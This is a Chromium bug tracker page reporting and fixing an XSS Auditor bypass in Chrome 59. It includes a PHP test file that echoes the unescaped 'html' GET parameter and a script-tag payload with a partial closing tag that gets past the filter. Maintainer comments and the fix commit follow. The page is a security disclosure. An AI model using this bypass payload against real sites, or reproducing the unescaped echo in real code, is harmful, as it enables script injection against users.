Issue 742459 link

Starred by 1 user

Issue metadata

Status:	Fixed
Owner:	tsepez@chromium.org
Closed:	Jul 2017
Cc:	█ mkwst@chromium.org
EstimatedDays:	----
NextAction:	----
OS:	Mac
Pri:	2
Type:	Bug
Via-Wizard-Security

XSS Auditor Bypass with partial closing script tag.

Reported by justt...@gmail.com, Jul 13 2017

Issue description

UserAgent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36

Steps to reproduce the problem:
1. mkdir /tmp/xss
2. copy the following into /tmp/xss/xss.php
~~~
<?php
header('X-XSS-Protection: 1; mode=block');
echo "<!DOCTYPE html><html><head></head><body>{$_GET['html']} </body></html>";
~~~
3. Run `php -S localhost:9999 /tmp/xss/xss.php`
4. http://localhost:9999/?html=%3Cscript%3Ealert(1);%3C/script
5. Notice how the alert dialog shows. 

The space before `</body>` is important, so the browser can determine  a new tag is being open, and "auto closes" the script tag.

What is the expected behavior?
Chrome should detect a reflected XSS exploit is occurring,  and should prevent the page from loading.

What went wrong?
Chrome loads the page and the XSS payload executes.

Did this work before? N/A 

Chrome version: 59.0.3071.115  Channel: stable
OS Version: OS X 10.12.5
Flash Version:

Comment 1 by tsepez@chromium.org, Jul 13 2017

Owner: tsepez@chromium.org
Status: Assigned (was: Unconfirmed)

Comment 2 by tsepez@chromium.org, Jul 13 2017

Cc: mkwst@chromium.org
Labels: -Type-Bug-Security -Restrict-View-SecurityTeam Type-Bug

We treat xssauditor bypasses as functional bugs per https://dev.chromium.org/Home/chromium-security/security-faq#TOC-Are-XSS-filter-bypasses-considered-security-bugs-

Nonetheless, thanks immensely for the report.  I'm not sure how we missed this case.

Comment 3 by tsepez@chromium.org, Jul 13 2017

Summary: XSS Auditor Bypass with partial closing script tag. (was: XSS Auditor Bypass)

Comment 4 by tsepez@chromium.org, Jul 13 2017

CL at https://chromium-review.googlesource.com/c/571018

Project Member

Comment 5 by bugdroid1@chromium.org, Jul 14 2017

The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/2a6689f99f6afc96bb93575d1d004632b9ed1e87

commit 2a6689f99f6afc96bb93575d1d004632b9ed1e87
Author: Tom Sepez <tsepez@chromium.org>
Date: Fri Jul 14 19:04:41 2017

XSSAuditor: handle partial closing script tag

Bug:  742459 
Change-Id: I228bccccb3f094e60a45dc3b9e8267c580f3d750
Reviewed-on: https://chromium-review.googlesource.com/571018
Reviewed-by: Mike West <mkwst@chromium.org>
Commit-Queue: Tom Sepez <tsepez@chromium.org>
Cr-Commit-Position: refs/heads/master@{#486826}
[add] https://crrev.com/2a6689f99f6afc96bb93575d1d004632b9ed1e87/third_party/WebKit/LayoutTests/http/tests/security/xssAuditor/script-tag-with-partial-close-expected.txt
[add] https://crrev.com/2a6689f99f6afc96bb93575d1d004632b9ed1e87/third_party/WebKit/LayoutTests/http/tests/security/xssAuditor/script-tag-with-partial-close.html
[modify] https://crrev.com/2a6689f99f6afc96bb93575d1d004632b9ed1e87/third_party/WebKit/Source/core/html/parser/XSSAuditor.cpp

Comment 6 by tsepez@chromium.org, Jul 14 2017

Status: Fixed (was: Assigned)

►

Issue 742459 link

Issue metadata

XSS Auditor Bypass with partial closing script tag.

Issue description

Comment 1 by tsepez@chromium.org, Jul 13 2017

Comment 1 Deleted

Comment 2 by tsepez@chromium.org, Jul 13 2017

Comment 2 Deleted

Comment 3 by tsepez@chromium.org, Jul 13 2017

Comment 3 Deleted

Comment 4 by tsepez@chromium.org, Jul 13 2017

Comment 4 Deleted

Comment 5 by bugdroid1@chromium.org, Jul 14 2017

Comment 5 Deleted

Comment 6 by tsepez@chromium.org, Jul 14 2017

Comment 6 Deleted

Sign in to add a comment